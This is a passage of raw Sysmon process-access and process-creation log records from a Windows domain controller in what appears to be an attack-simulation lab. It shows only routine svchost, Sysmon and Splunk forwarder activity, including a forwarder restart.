C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2878,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2879,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2880,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2881,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2882,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-00106A000500}\r\nTargetProcessId: 4956\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-00106A000500}","TargetProcessId":"4956","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2883,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.494\r\nSourceProcessGUID: {A837DB8D-0236-5F25-0000-00106A000500}\r\nSourceProcessId: 4956\r\nSourceThreadId: 876\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nTargetProcessId: 3088\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.494","SourceProcessGUID":"{A837DB8D-0236-5F25-0000-00106A000500}","SourceProcessId":"4956","SourceThreadId":"876","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","TargetProcessId":"3088","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2884,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.529\r\nProcessGuid: {A837DB8D-0236-5F25-0000-00104D030500}\r\nProcessId: 2540\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0236-5F25-0000-0010B8FD0400}\r\nParentProcessId: 4932\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=3088","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.529","ProcessGuid":"{A837DB8D-0236-5F25-0000-00104D030500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0236-5F25-0000-0010B8FD0400}","ParentProcessId":"4932","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=3088","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2885,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.525\r\nSourceProcessGUID: {A837DB8D-0236-5F25-0000-0010B8FD0400}\r\nSourceProcessId: 4932\r\nSourceThreadId: 4940\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-00104D030500}\r\nTargetProcessId: 2540\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.525","SourceProcessGUID":"{A837DB8D-0236-5F25-0000-0010B8FD0400}","SourceProcessId":"4932","SourceThreadId":"4940","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-00104D030500}","TargetProcessId":"2540","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+14738|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d8a0|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 